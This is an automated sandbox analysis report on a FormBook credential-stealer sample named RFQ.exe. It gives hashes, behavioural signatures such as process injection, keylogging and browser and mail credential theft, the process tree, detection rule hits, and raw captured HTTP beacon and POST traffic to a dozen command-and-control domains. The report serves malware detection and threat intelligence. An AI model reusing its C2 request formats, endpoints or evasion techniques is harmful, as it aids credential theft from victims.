
Windows Analysis Report
RFQ.exe

Overview

General Information

Sample name: RFQ.exe
Analysis ID: 1554222
MD5: b5e39c660b2e4f19cc14b94df9b6497c
SHA1: ee331feebc062f0b0a226d36e8f0817af0cc9d65
SHA256: 593c8605076c650720fcdfa1fada91472d792da661c0f6713f857a9780a6a6eb
Tags: exe, Formbook, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RFQ.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: B5E39C660B2E4F19CC14B94DF9B6497C)
    • svchost.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • aSgPuBFuPS.exe (PID: 3732 cmdline: "C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • net.exe (PID: 7724 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • aSgPuBFuPS.exe (PID: 2060 cmdline: "C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.3a0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.3a0000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 7596, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 7612, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 7596, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 7612, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-12T08:51:57.429971+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-12T08:52:35.768193+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.4 | 49741 | TCP

AV Detection

Source: RFQ.exe | Avira: detected
Source: http://www.corpseflowerwatch.org/yjfe/?L2m0Zn=ssLl/70GAhUcKdDjElf9oY7c1Toe/LKZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYqz93E4YYiGwwRQuF1AOSzaR72LbFn096Vw=&JPc=NBQdBBkPWTStX | Avira URL Cloud: Label: malware
Source: http://www.4nk.education/gnvu/ | Avira URL Cloud: Label: malware
Source: http://www.4nk.education/gnvu/?L2m0Zn=nxCjiJTB74oIWabXQvFQY5//bWyU0Jpkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhkS61tyoqX9N8hRwttUIYDPzkdcxTjy0zd8=&JPc=NBQdBBkPWTStX | Avira URL Cloud: Label: malware
Source: http://www.migraine-massages.pro/ym43/?L2m0Zn=lxK8zDwlVeZA0KFh+WdBcCErl/7WBlzLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRroDdY1V9/yZySfQKasoK6wF76Y2cOUueCY=&JPc=NBQdBBkPWTStX | Avira URL Cloud: Label: malware
Source: http://www.migraine-massages.pro/ym43/ | Avira URL Cloud: Label: malware
Source: RFQ.exe | ReversingLabs: Detection: 62%
Source: Yara match | File source: 1.2.svchost.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1820800178.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3506950733.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: RFQ.exe | Joe Sandbox ML: detected
Source: RFQ.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: net.pdbUGP | source: svchost.exe, 00000001.00000003.1789591630.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1789544492.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000002.3506537152.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: aSgPuBFuPS.exe, 00000002.00000000.1724430946.000000000098E000.00000002.00000001.01000000.00000004.sdmp, aSgPuBFuPS.exe, 00000005.00000000.1886858443.000000000098E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: RFQ.exe, 00000000.00000003.1671016595.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.1671169257.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1707773300.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1705276435.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.000000000360E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1822664609.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.0000000003470000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1820734447.0000000003114000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: RFQ.exe, 00000000.00000003.1671016595.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.1671169257.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1707773300.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1705276435.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000003.00000002.3507270235.000000000360E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1822664609.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.0000000003470000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1820734447.0000000003114000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: net.exe, 00000003.00000002.3508009639.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3506249546.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2106594111.000000001144C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: net.exe, 00000003.00000002.3508009639.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3506249546.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2106594111.000000001144C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: net.pdb | source: svchost.exe, 00000001.00000003.1789591630.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1789544492.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000002.3506537152.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F680C FindFirstFileW,FindClose,0_2_006F680C
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F68AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_006F68AD
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006ECF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006ECF94
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006ED2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006ED2C7
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F9560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006F9560
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F96BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006F96BB
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F9A49 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_006F9A49
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006EDADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_006EDADC
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F5BB5 FindFirstFileW,FindNextFileW,FindClose,0_2_006F5BB5
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_00B0C820 FindFirstFileW,FindNextFileW,FindClose,3_2_00B0C820
Source: C:\Windows\SysWOW64\net.exe | Code function: 4x nop then xor eax, eax | 3_2_00AF9D30
Source: C:\Windows\SysWOW64\net.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_032004E8
Source: Joe Sandbox View | IP Address: 128.65.195.180
Source: Joe Sandbox View | IP Address: 199.59.243.227
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49730
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49741
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006FCD62 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_006FCD62
Source: global traffic | HTTP traffic detected: GET /yjfe/?L2m0Zn=ssLl/70GAhUcKdDjElf9oY7c1Toe/LKZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYqz93E4YYiGwwRQuF1AOSzaR72LbFn096Vw=&JPc=NBQdBBkPWTStX HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.corpseflowerwatch.org | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /gnvu/?L2m0Zn=nxCjiJTB74oIWabXQvFQY5//bWyU0Jpkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhkS61tyoqX9N8hRwttUIYDPzkdcxTjy0zd8=&JPc=NBQdBBkPWTStX HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.4nk.education | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /ym43/?L2m0Zn=lxK8zDwlVeZA0KFh+WdBcCErl/7WBlzLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRroDdY1V9/yZySfQKasoK6wF76Y2cOUueCY=&JPc=NBQdBBkPWTStX HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.migraine-massages.pro | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /d26j/?L2m0Zn=yTdTvK6nwd7fLzOcZ1KS4TBFSWEE7xEBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3l8PVEl0DEVtj8ozSBQBBAVHa7hfB74pOyU=&JPc=NBQdBBkPWTStX HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.vnxoso88.art | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /afcr/?L2m0Zn=pxUnB3/JQIgHT0Xo3IWq6WCCUHVXBaIMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8ABar8QBPLOAn7b24mX56Fs9L7gSNzzZg1Hk=&JPc=NBQdBBkPWTStX HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.pluribiz.life | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /1iqa/?L2m0Zn=EIYp+2qno3OyA6JS9Y7uk1QSTQ5f7vCBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhVH33IbkgUmM7v94zdg8dOLyK52Qf4FB6p0=&JPc=NBQdBBkPWTStX HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.kdtzhb.top | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /293d/?JPc=NBQdBBkPWTStX&L2m0Zn=7bOTn4s4CK+jD9Jyb+vO73Pd/AR3TsBOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRY9J7LzjC0OYPsgDdyhfDZaDgEJItAmmuk4= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.evoo.website | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /vdvc/?L2m0Zn=5MdYmwdbGD0BDYmZXtqVosi+TlTx67ljMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReNcAXJ0cKe8GCCdvHCelE6JjJemFhTRqEaU=&JPc=NBQdBBkPWTStX HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.astorg-group.info | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0m8a/?JPc=NBQdBBkPWTStX&L2m0Zn=g30HQpd+HgMxFOssrIfrDJeMHEaPET3LohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp4aasf9fUqZys1Rw05sAbj1FN7j6PbWaPRM= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.fiqsth.vip | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /ezyn/?L2m0Zn=JlwzIZwI1xJFqouQZaQIGT5Gjbtg/srAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLN5/O1cb4M0DAqfax7N6cXJuCkbka7xORy4=&JPc=NBQdBBkPWTStX HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.bio-thymus.com | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /9ezc/?JPc=NBQdBBkPWTStX&L2m0Zn=xtzn0DJhGGCFi+NGW0356zy9k0R5ayLej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pe4/4DLJl/A2P/VorJYWOIYL6GivXmTWJR8= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.wukong.college | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.corpseflowerwatch.org
Source: global traffic | DNS traffic detected: DNS query: www.4nk.education
Source: global traffic | DNS traffic detected: DNS query: www.migraine-massages.pro
Source: global traffic | DNS traffic detected: DNS query: www.vnxoso88.art
Source: global traffic | DNS traffic detected: DNS query: www.pluribiz.life
Source: global traffic | DNS traffic detected: DNS query: www.kdtzhb.top
Source: global traffic | DNS traffic detected: DNS query: www.evoo.website
Source: global traffic | DNS traffic detected: DNS query: www.astorg-group.info
Source: global traffic | DNS traffic detected: DNS query: www.fiqsth.vip
Source: global traffic | DNS traffic detected: DNS query: www.bio-thymus.com
Source: global traffic | DNS traffic detected: DNS query: www.wukong.college
Source: global traffic | DNS traffic detected: DNS query: www.vehiculargustav.click
                Source: unknownHTTP traffic detected: POST /gnvu/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 203Cache-Control: max-age=0Connection: closeHost: www.4nk.educationOrigin: http://www.4nk.educationReferer: http://www.4nk.education/gnvu/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36Data Raw: 4c 32 6d 30 5a 6e 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 56 54 6c 50 34 43 6f 33 2b 73 53 46 39 58 35 37 77 41 6c 4e 44 71 4d 37 66 63 49 50 2b 57 4d 55 67 3d 3d Data Ascii: L2m0Zn=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTVTlP4Co3+sSF9X57wAlNDqM7fcIP+WMUg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:53:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:53:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
